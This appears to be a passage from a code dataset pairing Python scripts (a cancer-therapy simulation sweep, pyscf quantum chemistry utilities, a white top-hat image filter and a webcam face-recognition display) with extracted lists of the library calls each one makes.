3992), True, 'import numpy as np\n'), ((6388, 6501), 'librosa.cqt', 'librosa.cqt', ([], {'y': 'y', 'sr': 'sr', 'bins_per_octave': 'BINS_PER_OCTAVE', 'n_bins': '(N_OCTAVES * BINS_PER_OCTAVE)', 'hop_length': 'STEP'}), '(y=y, sr=sr, bins_per_octave=BINS_PER_OCTAVE, n_bins=N_OCTAVES *\n BINS_PER_OCTAVE, hop_length=STEP)\n', (6399, 6501), False, 
'import librosa\n'), ((15818, 15839), 'numpy.abs', 'np.abs', (['Xsync[20:, :]'], {}), '(Xsync[20:, :])\n', (15824, 15839), True, 'import numpy as np\n'), ((19652, 19703), 'scipy.spatial.distance.cosine', 'scipy.spatial.distance.cosine', (['center', 'distance_ref'], {}), '(center, distance_ref)\n', (19681, 19703), False, 'import scipy\n'), ((20087, 20136), 'scipy.spatial.distance.cosine', 'scipy.spatial.distance.cosine', (['center_i', 'center_j'], {}), '(center_i, center_j)\n', (20116, 20136), False, 'import scipy\n'), ((24766, 24799), 'numpy.mean', 'np.mean', (['X[:10 * NFFT, :]'], {'axis': '(0)'}), '(X[:10 * NFFT, :], axis=0)\n', (24773, 24799), True, 'import numpy as np\n'), ((25231, 25255), 'librosa.note_to_hz', 'librosa.note_to_hz', (['"""C1"""'], {}), "('C1')\n", (25249, 25255), False, 'import librosa\n'), ((25311, 25342), 'os.path.splitext', 'os.path.splitext', (['args.filename'], {}), '(args.filename)\n', (25327, 25342), False, 'import sys, os\n'), ((7155, 7165), 'sys.exit', 'sys.exit', ([], {}), '()\n', (7163, 7165), False, 'import sys, os\n'), ((9853, 9879), 'numpy.where', 'np.where', (['(1 - evals > 0.75)'], {}), '(1 - evals > 0.75)\n', (9861, 9879), True, 'import numpy as np\n'), ((10957, 10967), 'sys.exit', 'sys.exit', ([], {}), '()\n', (10965, 10967), False, 'import sys, os\n'), ((9804, 9815), 'numpy.mean', 'np.mean', (['nc'], {}), '(nc)\n', (9811, 9815), True, 'import numpy as np\n'), ((10024, 10049), 'numpy.cumsum', 'np.cumsum', (['(e ** 2)'], {'axis': '(1)'}), '(e ** 2, axis=1)\n', (10033, 10049), True, 'import numpy as np\n'), ((19763, 19799), 'numpy.sum', 'np.sum', (['((center - distance_ref) ** 2)'], {}), '((center - distance_ref) ** 2)\n', (19769, 19799), True, 'import numpy as np\n'), ((20196, 20230), 'numpy.sum', 'np.sum', (['((center_i - center_j) ** 2)'], {}), '((center_i - center_j) ** 2)\n', (20202, 20230), True, 'import numpy as np\n'), ((10717, 10733), 'numpy.argmax', 'np.argmax', (['score'], {}), '(score)\n', (10726, 10733), True, 'import numpy as np\n'), ((10787, 10803), 'numpy.argmin', 'np.argmin', (['score'], {}), '(score)\n', (10796, 10803), True, 'import numpy as np\n'), ((10859, 10875), 'numpy.argmax', 'np.argmax', (['score'], {}), '(score)\n', (10868, 10875), True, 'import numpy as np\n')]
|
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import common_fn as cf
import seaborn as sns
plt.rcParams["svg.hashsalt"]=0
pre_path='EnvEq/All3/'
parm_format='{:.2e}'
parm_name='therapy_abi-Tneg_initratio-Totcell'
parm_name_array=['Tneg_initratio','Totcell']
post_path1='o2-Null_test-HE/'
parm_name1=parm_name+'/'+post_path1
cf.mkdirs(pre_path=pre_path,parm_name=parm_name1)
#iterator over these
ir_arr=np.logspace(-1,-3,5)
tot_cell_arr=np.array([1000,2000,4000])
cases=['No','AT','AT_nn','MT','SOC']
parms_array=np.empty([0,2])
for ir in ir_arr:
for tc in tot_cell_arr:
parms_array=np.append(parms_array,[[ir,tc]],axis=0)
for case in cases:
post_path=post_path1+case+'-'
cf.timeseries(pre_path=pre_path,parm_name=parm_name,parm_array=parms_array,parm_format=parm_format,post_path=post_path)
df=cf.eq_values(pre_path=pre_path,parm_name=parm_name,parm_array=parms_array,parm_format=parm_format,parm_name_array=parm_name_array,post_path=post_path,ttp=True,limit=9000)
|
[
"common_fn.mkdirs",
"common_fn.eq_values",
"common_fn.timeseries",
"numpy.array",
"numpy.append",
"numpy.empty",
"numpy.logspace"
] |
[((350, 400), 'common_fn.mkdirs', 'cf.mkdirs', ([], {'pre_path': 'pre_path', 'parm_name': 'parm_name1'}), '(pre_path=pre_path, parm_name=parm_name1)\n', (359, 400), True, 'import common_fn as cf\n'), ((429, 451), 'numpy.logspace', 'np.logspace', (['(-1)', '(-3)', '(5)'], {}), '(-1, -3, 5)\n', (440, 451), True, 'import numpy as np\n'), ((463, 491), 'numpy.array', 'np.array', (['[1000, 2000, 4000]'], {}), '([1000, 2000, 4000])\n', (471, 491), True, 'import numpy as np\n'), ((540, 556), 'numpy.empty', 'np.empty', (['[0, 2]'], {}), '([0, 2])\n', (548, 556), True, 'import numpy as np\n'), ((728, 856), 'common_fn.timeseries', 'cf.timeseries', ([], {'pre_path': 'pre_path', 'parm_name': 'parm_name', 'parm_array': 'parms_array', 'parm_format': 'parm_format', 'post_path': 'post_path'}), '(pre_path=pre_path, parm_name=parm_name, parm_array=\n parms_array, parm_format=parm_format, post_path=post_path)\n', (741, 856), True, 'import common_fn as cf\n'), ((855, 1041), 'common_fn.eq_values', 'cf.eq_values', ([], {'pre_path': 'pre_path', 'parm_name': 'parm_name', 'parm_array': 'parms_array', 'parm_format': 'parm_format', 'parm_name_array': 'parm_name_array', 'post_path': 'post_path', 'ttp': '(True)', 'limit': '(9000)'}), '(pre_path=pre_path, parm_name=parm_name, parm_array=parms_array,\n parm_format=parm_format, parm_name_array=parm_name_array, post_path=\n post_path, ttp=True, limit=9000)\n', (867, 1041), True, 'import common_fn as cf\n'), ((622, 664), 'numpy.append', 'np.append', (['parms_array', '[[ir, tc]]'], {'axis': '(0)'}), '(parms_array, [[ir, tc]], axis=0)\n', (631, 664), True, 'import numpy as np\n')]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*
"""
tools module
"""
__author__ = 'Dr. <NAME>, University of Bristol, UK'
__maintainer__ = 'Dr. <NAME>'
__email__ = '<EMAIL>'
__status__ = 'Development'
import sys
import os
import copy
import numpy as np
try:
import opt_einsum as oe
OE_AVAILABLE = True
except ImportError:
OE_AVAILABLE = False
from subprocess import Popen, PIPE
from pyscf import gto, scf, dft, symm, lib
from pyscf import tools as pyscf_tools
from typing import Tuple, List, Dict, Union
MAX_CYCLE = 100
NATORB_THRES = 1.e-12
class Logger(object):
"""
this class pipes all write statements to both stdout and output_file
"""
def __init__(self, output_file, both=True) -> None:
"""
init Logger
"""
self.terminal = sys.stdout
self.log = open(output_file, 'a')
self.both = both
def write(self, message) -> None:
"""
define write
"""
self.log.write(message)
if self.both:
self.terminal.write(message)
def flush(self) -> None:
"""
define flush
"""
pass
def git_version() -> str:
"""
this function returns the git revision as a string
"""
def _minimal_ext_cmd(cmd):
env = {}
for k in ['SYSTEMROOT', 'PATH', 'HOME']:
v = os.environ.get(k)
if v is not None:
env[k] = v
# LANGUAGE is used on win32
env['LANGUAGE'] = 'C'
env['LANG'] = 'C'
env['LC_ALL'] = 'C'
out = Popen(cmd, stdout=PIPE, env=env, \
cwd=os.path.dirname(__file__)).communicate()[0]
return out
try:
out = _minimal_ext_cmd(['git', 'rev-parse', 'HEAD'])
GIT_REVISION = out.strip().decode('ascii')
except OSError:
GIT_REVISION = "Unknown"
return GIT_REVISION
def dim(mo_occ: np.ndarray) -> Tuple[np.ndarray, np.ndarray]:
"""
determine molecular dimensions
"""
return np.where(np.abs(mo_occ[0]) > 0.)[0], np.where(np.abs(mo_occ[1]) > 0.)[0]
def mf_info(mf: Union[scf.hf.SCF, dft.rks.KohnShamDFT]) -> Tuple[Tuple[np.ndarray, np.ndarray], \
Tuple[np.ndarray, np.ndarray]]:
"""
retrieve mf information (mo coefficients & occupations)
"""
# mo occupations
if np.asarray(mf.mo_occ).ndim == 1:
mo_occ = (np.ones(np.count_nonzero(0. < mf.mo_occ)), np.ones(np.count_nonzero(1. < mf.mo_occ)))
else:
mo_occ = (mf.mo_occ[0][np.nonzero(mf.mo_occ[0])], mf.mo_occ[1][np.nonzero(mf.mo_occ[1])])
# dimensions
alpha, beta = dim(mo_occ)
# mo coefficients
if np.asarray(mf.mo_coeff).ndim == 2:
mo_coeff = (mf.mo_coeff[:, alpha], mf.mo_coeff[:, beta])
else:
mo_coeff = (mf.mo_coeff[0][:, alpha], mf.mo_coeff[1][:, beta])
return mo_coeff, mo_occ
def orbsym(mol, mo_coeff):
"""
    this function returns orbital symmetries
"""
if isinstance(mo_coeff, np.ndarray):
if mo_coeff.ndim == 2:
try:
orbsymm = symm.label_orb_symm(mol, mol.irrep_name, mol.symm_orb, mo_coeff)
except:
orbsymm = np.array(['A'] * mo_coeff.shape[1])
else:
try:
orbsymm = np.array([symm.label_orb_symm(mol, mol.irrep_name, mol.symm_orb, c) for c in mo_coeff])
except:
orbsymm = np.array([['A'] * c.shape[1] for c in mo_coeff])
else:
try:
orbsymm = np.array([symm.label_orb_symm(mol, mol.irrep_name, mol.symm_orb, c) for c in mo_coeff])
except:
orbsymm = np.array([['A'] * c.shape[1] for c in mo_coeff])
return orbsymm
def make_rdm1(mo: np.ndarray, occup: np.ndarray) -> np.ndarray:
"""
    this function returns a 1-RDM (in the ao basis) corresponding to the given mo(s)
"""
return contract('ip,jp->ij', occup * mo, mo)
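# Illustrative sketch (not part of the original module): for two orthonormal
# orbitals with occupations [2., 0.], the contraction above reduces to a
# diagonal density matrix:
#
#   >>> make_rdm1(np.eye(2), np.array([2., 0.]))
#   array([[2., 0.],
#          [0., 0.]])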
def make_natorb(mol: gto.Mole, mo_coeff: np.ndarray, \
rdm1: np.ndarray, thres: float = NATORB_THRES) -> Tuple[Tuple[np.ndarray, np.ndarray], \
Tuple[np.ndarray, np.ndarray]]:
"""
    this function returns natural orbital (no) coefficients and occupations
    corresponding to the given mo coefficients and rdm1
"""
# reshape mo_coeff and rdm1
if mo_coeff.ndim == 2:
c = np.asarray((mo_coeff,) * 2)
else:
c = mo_coeff
if rdm1.ndim == 2:
d = np.array([rdm1, rdm1]) * .5
else:
d = rdm1
# overlap matrix
s = mol.intor_symmetric('int1e_ovlp')
# ao to mo transformation of dm
rdm1_mo = contract('xpi,pq,xqr,rs,xsj->xij', c, s, d, s, c)
# diagonalize rdm1_mo
occ_no, u = np.linalg.eigh(rdm1_mo)
# transform to no basis
mo_no = contract('xip,xpj->xij', c, u)
# retain only significant nos
return (mo_no[0][:, np.where(np.abs(occ_no[0]) >= thres)[0]], mo_no[1][:, np.where(np.abs(occ_no[1]) >= thres)[0]]), \
(occ_no[0][np.where(np.abs(occ_no[0]) >= thres)], occ_no[1][np.where(np.abs(occ_no[1]) >= thres)])
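# Sketch of the underlying relation (illustrative only, spin axis dropped for
# brevity): for an idempotent closed-shell density the transformed matrix
# C^T S D S C is already diagonal, so np.linalg.eigh simply recovers the
# occupations (in ascending order):
#
#   >>> s = c = np.eye(2)
#   >>> d = np.diag([2., 0.])
#   >>> np.linalg.eigh(np.einsum('pi,pq,qr,rs,sj->ij', c, s, d, s, c))[0]
#   array([0., 2.])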
def write_rdm1(mol: gto.Mole, part: str, \
mo_coeff: np.ndarray, mo_occ: np.ndarray, fmt: str, \
weights: List[np.ndarray], \
suffix: str = '') -> None:
"""
this function writes a 1-RDM as a numpy or cube (default) file
"""
# assertion
assert part == 'atoms', '`write_rdm1` function only implemented for `atoms` partitioning'
assert fmt in ['cube', 'numpy'], 'fmt arg to `write_rdm1` must be `cube` or `numpy`'
# molecular dimensions
alpha, beta = dim(mo_occ)
# compute total 1-RDM (AO basis)
rdm1_tot = np.array([make_rdm1(mo_coeff[0], mo_occ[0]), make_rdm1(mo_coeff[1], mo_occ[1])])
# loop over atoms
for a in range(mol.natm):
# atom-specific rdm1
rdm1_atom = np.zeros_like(rdm1_tot)
# loop over spins
for i, spin_mo in enumerate((alpha, beta)):
# loop over spin-orbitals
for m, j in enumerate(spin_mo):
# get orbital(s)
orb = mo_coeff[i][:, j].reshape(mo_coeff[i].shape[0], -1)
# orbital-specific rdm1
rdm1_orb = make_rdm1(orb, mo_occ[i][j])
# weighted contribution to rdm1_atom
rdm1_atom[i] += rdm1_orb * weights[i][m][a]
if fmt == 'cube':
# write rdm1_atom as cube file
pyscf_tools.cubegen.density(mol, f'atom_{mol.atom_symbol(a).upper():s}{a:d}_rdm1{suffix:}.cube', \
np.sum(rdm1_atom, axis=0))
else:
# write rdm1_atom as numpy file
np.save(f'atom_{mol.atom_symbol(a).upper():s}{a:d}_rdm1{suffix:}.npy', np.sum(rdm1_atom, axis=0))
def res_add(res_a, res_b):
"""
this function adds two result dictionaries
"""
return {key: res_a[key] + res_b[key] for key in res_a.keys()}
def res_sub(res_a, res_b):
"""
this function subtracts two result dictionaries
"""
return {key: res_a[key] - res_b[key] for key in res_a.keys()}
def contract(eqn, *tensors):
"""
interface to optimized einsum operation
"""
if OE_AVAILABLE:
return oe.contract(eqn, *tensors)
else:
return np.einsum(eqn, *tensors, optimize=True)
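# Usage example (illustrative only): `contract` follows the numpy.einsum
# calling convention, so a plain matrix product can be written as
#
#   >>> a = np.arange(4.).reshape(2, 2)
#   >>> b = np.eye(2)
#   >>> np.allclose(contract('ij,jk->ik', a, b), a @ b)
#   True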
|
[
"opt_einsum.contract",
"numpy.abs",
"numpy.asarray",
"os.environ.get",
"numpy.count_nonzero",
"numpy.array",
"numpy.sum",
"os.path.dirname",
"numpy.einsum",
"numpy.nonzero",
"numpy.linalg.eigh",
"pyscf.symm.label_orb_symm",
"numpy.zeros_like"
] |
[((5197, 5220), 'numpy.linalg.eigh', 'np.linalg.eigh', (['rdm1_mo'], {}), '(rdm1_mo)\n', (5211, 5220), True, 'import numpy as np\n'), ((4795, 4822), 'numpy.asarray', 'np.asarray', (['((mo_coeff,) * 2)'], {}), '((mo_coeff,) * 2)\n', (4805, 4822), True, 'import numpy as np\n'), ((6408, 6431), 'numpy.zeros_like', 'np.zeros_like', (['rdm1_tot'], {}), '(rdm1_tot)\n', (6421, 6431), True, 'import numpy as np\n'), ((7891, 7917), 'opt_einsum.contract', 'oe.contract', (['eqn', '*tensors'], {}), '(eqn, *tensors)\n', (7902, 7917), True, 'import opt_einsum as oe\n'), ((7951, 7990), 'numpy.einsum', 'np.einsum', (['eqn', '*tensors'], {'optimize': '(True)'}), '(eqn, *tensors, optimize=True)\n', (7960, 7990), True, 'import numpy as np\n'), ((1464, 1481), 'os.environ.get', 'os.environ.get', (['k'], {}), '(k)\n', (1478, 1481), False, 'import os\n'), ((2591, 2612), 'numpy.asarray', 'np.asarray', (['mf.mo_occ'], {}), '(mf.mo_occ)\n', (2601, 2612), True, 'import numpy as np\n'), ((2940, 2963), 'numpy.asarray', 'np.asarray', (['mf.mo_coeff'], {}), '(mf.mo_coeff)\n', (2950, 2963), True, 'import numpy as np\n'), ((4905, 4927), 'numpy.array', 'np.array', (['[rdm1, rdm1]'], {}), '([rdm1, rdm1])\n', (4913, 4927), True, 'import numpy as np\n'), ((2654, 2687), 'numpy.count_nonzero', 'np.count_nonzero', (['(0.0 < mf.mo_occ)'], {}), '(0.0 < mf.mo_occ)\n', (2670, 2687), True, 'import numpy as np\n'), ((2697, 2730), 'numpy.count_nonzero', 'np.count_nonzero', (['(1.0 < mf.mo_occ)'], {}), '(1.0 < mf.mo_occ)\n', (2713, 2730), True, 'import numpy as np\n'), ((2781, 2805), 'numpy.nonzero', 'np.nonzero', (['mf.mo_occ[0]'], {}), '(mf.mo_occ[0])\n', (2791, 2805), True, 'import numpy as np\n'), ((2821, 2845), 'numpy.nonzero', 'np.nonzero', (['mf.mo_occ[1]'], {}), '(mf.mo_occ[1])\n', (2831, 2845), True, 'import numpy as np\n'), ((3400, 3464), 'pyscf.symm.label_orb_symm', 'symm.label_orb_symm', (['mol', 'mol.irrep_name', 'mol.symm_orb', 'mo_coeff'], {}), '(mol, mol.irrep_name, mol.symm_orb, mo_coeff)\n', (3419, 3464), False, 'from pyscf import gto, scf, dft, symm, lib\n'), ((4006, 4056), 'numpy.array', 'np.array', (["[(['A'] * c.shape[1]) for c in mo_coeff]"], {}), "([(['A'] * c.shape[1]) for c in mo_coeff])\n", (4014, 4056), True, 'import numpy as np\n'), ((7184, 7209), 'numpy.sum', 'np.sum', (['rdm1_atom'], {'axis': '(0)'}), '(rdm1_atom, axis=0)\n', (7190, 7209), True, 'import numpy as np\n'), ((7364, 7389), 'numpy.sum', 'np.sum', (['rdm1_atom'], {'axis': '(0)'}), '(rdm1_atom, axis=0)\n', (7370, 7389), True, 'import numpy as np\n'), ((2206, 2223), 'numpy.abs', 'np.abs', (['mo_occ[0]'], {}), '(mo_occ[0])\n', (2212, 2223), True, 'import numpy as np\n'), ((2243, 2260), 'numpy.abs', 'np.abs', (['mo_occ[1]'], {}), '(mo_occ[1])\n', (2249, 2260), True, 'import numpy as np\n'), ((3519, 3554), 'numpy.array', 'np.array', (["(['A'] * mo_coeff.shape[1])"], {}), "(['A'] * mo_coeff.shape[1])\n", (3527, 3554), True, 'import numpy as np\n'), ((3766, 3816), 'numpy.array', 'np.array', (["[(['A'] * c.shape[1]) for c in mo_coeff]"], {}), "([(['A'] * c.shape[1]) for c in mo_coeff])\n", (3774, 3816), True, 'import numpy as np\n'), ((3882, 3939), 'pyscf.symm.label_orb_symm', 'symm.label_orb_symm', (['mol', 'mol.irrep_name', 'mol.symm_orb', 'c'], {}), '(mol, mol.irrep_name, mol.symm_orb, c)\n', (3901, 3939), False, 'from pyscf import gto, scf, dft, symm, lib\n'), ((3634, 3691), 'pyscf.symm.label_orb_symm', 'symm.label_orb_symm', (['mol', 'mol.irrep_name', 'mol.symm_orb', 'c'], {}), '(mol, mol.irrep_name, mol.symm_orb, c)\n', (3653, 3691), False, 'from 
pyscf import gto, scf, dft, symm, lib\n'), ((5500, 5517), 'numpy.abs', 'np.abs', (['occ_no[0]'], {}), '(occ_no[0])\n', (5506, 5517), True, 'import numpy as np\n'), ((5549, 5566), 'numpy.abs', 'np.abs', (['occ_no[1]'], {}), '(occ_no[1])\n', (5555, 5566), True, 'import numpy as np\n'), ((1764, 1789), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (1779, 1789), False, 'import os\n'), ((5375, 5392), 'numpy.abs', 'np.abs', (['occ_no[0]'], {}), '(occ_no[0])\n', (5381, 5392), True, 'import numpy as np\n'), ((5429, 5446), 'numpy.abs', 'np.abs', (['occ_no[1]'], {}), '(occ_no[1])\n', (5435, 5446), True, 'import numpy as np\n')]
|
import numpy as np
from ._base import FilterAlgorithmBase
class WhiteTophat(FilterAlgorithmBase):
"""
    Performs "white top hat" filtering of an image to enhance spots. White top hat filtering
    finds spots that are smaller than the structuring element and brighter than their surroundings.
See Also
--------
https://en.wikipedia.org/wiki/Top-hat_transform
"""
def __init__(self, disk_size, **kwargs):
"""Instance of a white top hat morphological masking filter which masks objects larger than `disk_size`
Parameters
----------
disk_size : int
diameter of the morphological masking disk in pixels
"""
self.disk_size = disk_size
@classmethod
def add_arguments(cls, group_parser):
group_parser.add_argument(
"--disk-size", default=15, type=int, help="diameter of morphological masking disk in pixels")
def filter(self, stack) -> None:
"""Perform in-place filtering of an image stack and all contained aux images
Parameters
----------
stack : starfish.Stack
Stack to be filtered
"""
from scipy.ndimage.filters import maximum_filter, minimum_filter
from skimage.morphology import disk
def white_tophat(image):
if image.dtype.kind != "u":
raise TypeError("images should be stored in an unsigned integer array")
structuring_element = disk(self.disk_size)
min_filtered = minimum_filter(image, footprint=structuring_element)
max_filtered = maximum_filter(min_filtered, footprint=structuring_element)
filtered_image = image - np.minimum(image, max_filtered)
return filtered_image
stack.image.apply(white_tophat)
# apply to aux dict too.
for auxiliary_image in stack.auxiliary_images.values():
auxiliary_image.apply(white_tophat)
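# Illustrative sketch (hypothetical toy image, not part of the original
# module): a single bright pixel on a flat background survives the top hat,
# because the morphological opening (minimum then maximum filter with the
# disk) erases structures smaller than the disk, and subtracting the opened
# image leaves only the small bright spot.
#
#   >>> import numpy as np
#   >>> from scipy.ndimage.filters import maximum_filter, minimum_filter
#   >>> from skimage.morphology import disk
#   >>> img = np.zeros((9, 9), dtype=np.uint8)
#   >>> img[4, 4] = 255
#   >>> selem = disk(2)
#   >>> opened = maximum_filter(minimum_filter(img, footprint=selem), footprint=selem)
#   >>> int((img - np.minimum(img, opened))[4, 4])
#   255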
|
[
"numpy.minimum",
"skimage.morphology.disk",
"scipy.ndimage.filters.maximum_filter",
"scipy.ndimage.filters.minimum_filter"
] |
[((1454, 1474), 'skimage.morphology.disk', 'disk', (['self.disk_size'], {}), '(self.disk_size)\n', (1458, 1474), False, 'from skimage.morphology import disk\n'), ((1502, 1554), 'scipy.ndimage.filters.minimum_filter', 'minimum_filter', (['image'], {'footprint': 'structuring_element'}), '(image, footprint=structuring_element)\n', (1516, 1554), False, 'from scipy.ndimage.filters import maximum_filter, minimum_filter\n'), ((1582, 1641), 'scipy.ndimage.filters.maximum_filter', 'maximum_filter', (['min_filtered'], {'footprint': 'structuring_element'}), '(min_filtered, footprint=structuring_element)\n', (1596, 1641), False, 'from scipy.ndimage.filters import maximum_filter, minimum_filter\n'), ((1679, 1710), 'numpy.minimum', 'np.minimum', (['image', 'max_filtered'], {}), '(image, max_filtered)\n', (1689, 1710), True, 'import numpy as np\n')]
|
import datetime
import cv2
import numpy as np
from artsci2019.lib.frame_checker import FrameChecker
from artsci2019.lib.util import scale_frame, scale_point, is_in_frame
from artsci2019.lib.face_recog import get_faces
from artsci2019.lib.sound import SoundPlayer
def draw_checked_frame(frame, checked_frame, factor):
green = (100, 255, 100)
red = (100, 100, 255)
eye_line_color = green if checked_frame.width_ok else red
cv2.line(frame,
scale_point(checked_frame.left_eye, factor),
scale_point(checked_frame.right_eye, factor),
eye_line_color,
thickness=2)
centre_line_color = green if checked_frame.centre_ok else red
cv2.line(frame,
scale_point(checked_frame.centre, factor),
scale_point(checked_frame.centre_target, factor),
centre_line_color,
thickness=4)
height_line_color = green if checked_frame.height_ok else red
cv2.line(frame,
scale_point(checked_frame.h_min_point, factor),
scale_point(checked_frame.h_max_point, factor),
height_line_color,
thickness=2)
def draw_triangles(frame, checked_frame, factor):
f_h, f_w, _ = checked_frame.recognized_frame.frame.shape
# prep delaunay
rect = (0, 0, f_w, f_h)
subdiv = cv2.Subdiv2D(rect)
for lm in checked_frame.recognized_frame.face_landmarks:
if is_in_frame(f_w, f_h, lm):
subdiv.insert(lm)
print("triangles: {}".format(len(subdiv.getTriangleList())))
for t in subdiv.getTriangleList():
t = np.reshape(t, (3, 2)).astype(np.int32)
pt1 = scale_point(tuple(t[0]), factor)
pt2 = scale_point(tuple(t[1]), factor)
pt3 = scale_point(tuple(t[2]), factor)
cv2.line(frame, pt1, pt2, (255, 255, 255), 1, 8, 0)
cv2.line(frame, pt2, pt3, (255, 255, 255), 1, 8, 0)
cv2.line(frame, pt3, pt1, (255, 255, 255), 1, 8, 0)
def my_get_frame(video_capture, rotate):
# get a single frame
rval, frame = video_capture.read()
if rotate:
        # transpose followed by a horizontal flip rotates the frame 90 degrees clockwise
        frame = cv2.transpose(frame)
        frame = cv2.flip(frame, flipCode=1)
return rval, frame
class InteractiveDisplay:
def __init__(self, camera_number, rotate, fullscreen, processing_backend):
self.camera_number = camera_number
self.rotate = rotate
self.fullscreen = fullscreen
self.debug_scaling = 1/2
if fullscreen:
self.debug_scaling = 1
self.scaling_factor = 4
self.preview_window = "preview"
self.genimage_window = "genimage"
self.genimage = None
self.video_capture = None
self.collected_frames = []
self.pb = processing_backend
self.current_checked_frames = []
self.checkpoint_time = datetime.datetime.now() + datetime.timedelta(seconds=10)
self.frame_checker = None
self.sound_player = SoundPlayer("bing.wav")
def init(self):
# initialize window
cv2.namedWindow(self.preview_window, cv2.WINDOW_NORMAL)
cv2.namedWindow(self.genimage_window, cv2.WINDOW_NORMAL) # WINDOW_NORMAL required for fullscreen to work
if self.fullscreen:
cv2.setWindowProperty(self.genimage_window, cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)
# get webcam
self.video_capture = cv2.VideoCapture(self.camera_number)
self.video_capture.set(3, 1920)
self.video_capture.set(4, 1080)
rval = False
frame = None
if self.video_capture.isOpened(): # try to get the first frame
rval, frame = my_get_frame(self.video_capture, self.rotate)
if frame is not None:
self.genimage = scale_frame(frame, self.debug_scaling)
cv2.imshow(self.genimage_window, self.genimage)
if self.rotate:
self.frame_checker = FrameChecker(1080, 1920)
else:
self.frame_checker = FrameChecker(1920, 1080)
return rval
def teardown(self):
cv2.destroyWindow(self.preview_window)
cv2.destroyWindow(self.genimage_window)
self.video_capture.release()
def portrait_update(self, checked_frames):
current_time = datetime.datetime.now()
if current_time < self.checkpoint_time:
print("too early")
return # too early for an update
# update portrait
ok_frames = [cf.recognized_frame
for cf in checked_frames
if cf.all_ok]
changed = False
if ok_frames:
print("Updating")
self.sound_player.play()
changed = self.pb.update(ok_frames)
if changed:
print("Updated")
portrait_frame = self.pb.get_portrait()
f = scale_frame(portrait_frame, self.debug_scaling)
self.genimage = f
cv2.imshow(self.genimage_window, self.genimage)
self.checkpoint_time = current_time + datetime.timedelta(seconds=10)
return changed
def loop_update(self, frame):
frame = scale_frame(frame, self.debug_scaling)
new_preview = frame
new_genimage = self.genimage
current_time = datetime.datetime.now()
if current_time > self.checkpoint_time and self.current_checked_frames:
# draw face lines
score = max([cf.total_score for cf in self.current_checked_frames])
for cf in self.current_checked_frames:
print("Score: {}".format(cf.total_score))
new_genimage = cv2.addWeighted(self.genimage, 1 - score, frame, score, 0)
# draw_triangles(new_genimage, self.current_checked_frames[0], self.debug_scaling)
# draw_triangles(new_preview, self.current_checked_frames[0], self.debug_scaling)
if score > 0.5:
print("YO")
draw_triangles(new_genimage, self.current_checked_frames[0], self.debug_scaling)
# Display the resulting image
cv2.imshow(self.preview_window, new_preview)
cv2.imshow(self.genimage_window, new_genimage)
cv2.waitKey(50)
changed = self.portrait_update(self.current_checked_frames)
def start(self):
process_this_frame = True
rval = True
while rval:
# get a single frame
rval, frame = my_get_frame(self.video_capture, self.rotate)
# TODO drop frames while processing
# get the faces
if process_this_frame:
rfs = get_faces(frame, self.scaling_factor)
self.current_checked_frames = [self.frame_checker.check(rf) for rf in rfs]
process_this_frame = not process_this_frame
self.loop_update(frame)
# exit on ESC
key = cv2.waitKey(20)
if key == 113: # exit on q
break
|
[
"artsci2019.lib.util.scale_point",
"cv2.transpose",
"artsci2019.lib.sound.SoundPlayer",
"cv2.imshow",
"datetime.timedelta",
"artsci2019.lib.frame_checker.FrameChecker",
"numpy.reshape",
"cv2.line",
"cv2.addWeighted",
"cv2.waitKey",
"cv2.Subdiv2D",
"cv2.namedWindow",
"artsci2019.lib.util.is_in_frame",
"cv2.setWindowProperty",
"cv2.flip",
"cv2.destroyWindow",
"artsci2019.lib.face_recog.get_faces",
"datetime.datetime.now",
"cv2.VideoCapture",
"artsci2019.lib.util.scale_frame"
] |
[((1334, 1352), 'cv2.Subdiv2D', 'cv2.Subdiv2D', (['rect'], {}), '(rect)\n', (1346, 1352), False, 'import cv2\n'), ((470, 513), 'artsci2019.lib.util.scale_point', 'scale_point', (['checked_frame.left_eye', 'factor'], {}), '(checked_frame.left_eye, factor)\n', (481, 513), False, 'from artsci2019.lib.util import scale_frame, scale_point, is_in_frame\n'), ((528, 572), 'artsci2019.lib.util.scale_point', 'scale_point', (['checked_frame.right_eye', 'factor'], {}), '(checked_frame.right_eye, factor)\n', (539, 572), False, 'from artsci2019.lib.util import scale_frame, scale_point, is_in_frame\n'), ((729, 770), 'artsci2019.lib.util.scale_point', 'scale_point', (['checked_frame.centre', 'factor'], {}), '(checked_frame.centre, factor)\n', (740, 770), False, 'from artsci2019.lib.util import scale_frame, scale_point, is_in_frame\n'), ((785, 833), 'artsci2019.lib.util.scale_point', 'scale_point', (['checked_frame.centre_target', 'factor'], {}), '(checked_frame.centre_target, factor)\n', (796, 833), False, 'from artsci2019.lib.util import scale_frame, scale_point, is_in_frame\n'), ((993, 1039), 'artsci2019.lib.util.scale_point', 'scale_point', (['checked_frame.h_min_point', 'factor'], {}), '(checked_frame.h_min_point, factor)\n', (1004, 1039), False, 'from artsci2019.lib.util import scale_frame, scale_point, is_in_frame\n'), ((1054, 1100), 'artsci2019.lib.util.scale_point', 'scale_point', (['checked_frame.h_max_point', 'factor'], {}), '(checked_frame.h_max_point, factor)\n', (1065, 1100), False, 'from artsci2019.lib.util import scale_frame, scale_point, is_in_frame\n'), ((1425, 1450), 'artsci2019.lib.util.is_in_frame', 'is_in_frame', (['f_w', 'f_h', 'lm'], {}), '(f_w, f_h, lm)\n', (1436, 1450), False, 'from artsci2019.lib.util import scale_frame, scale_point, is_in_frame\n'), ((1786, 1837), 'cv2.line', 'cv2.line', (['frame', 'pt1', 'pt2', '(255, 255, 255)', '(1)', '(8)', '(0)'], {}), '(frame, pt1, pt2, (255, 255, 255), 1, 8, 0)\n', (1794, 1837), False, 'import cv2\n'), ((1846, 1897), 'cv2.line', 'cv2.line', (['frame', 'pt2', 'pt3', '(255, 255, 255)', '(1)', '(8)', '(0)'], {}), '(frame, pt2, pt3, (255, 255, 255), 1, 8, 0)\n', (1854, 1897), False, 'import cv2\n'), ((1906, 1957), 'cv2.line', 'cv2.line', (['frame', 'pt3', 'pt1', '(255, 255, 255)', '(1)', '(8)', '(0)'], {}), '(frame, pt3, pt1, (255, 255, 255), 1, 8, 0)\n', (1914, 1957), False, 'import cv2\n'), ((2097, 2117), 'cv2.transpose', 'cv2.transpose', (['frame'], {}), '(frame)\n', (2110, 2117), False, 'import cv2\n'), ((2134, 2161), 'cv2.flip', 'cv2.flip', (['frame'], {'flipCode': '(1)'}), '(frame, flipCode=1)\n', (2142, 2161), False, 'import 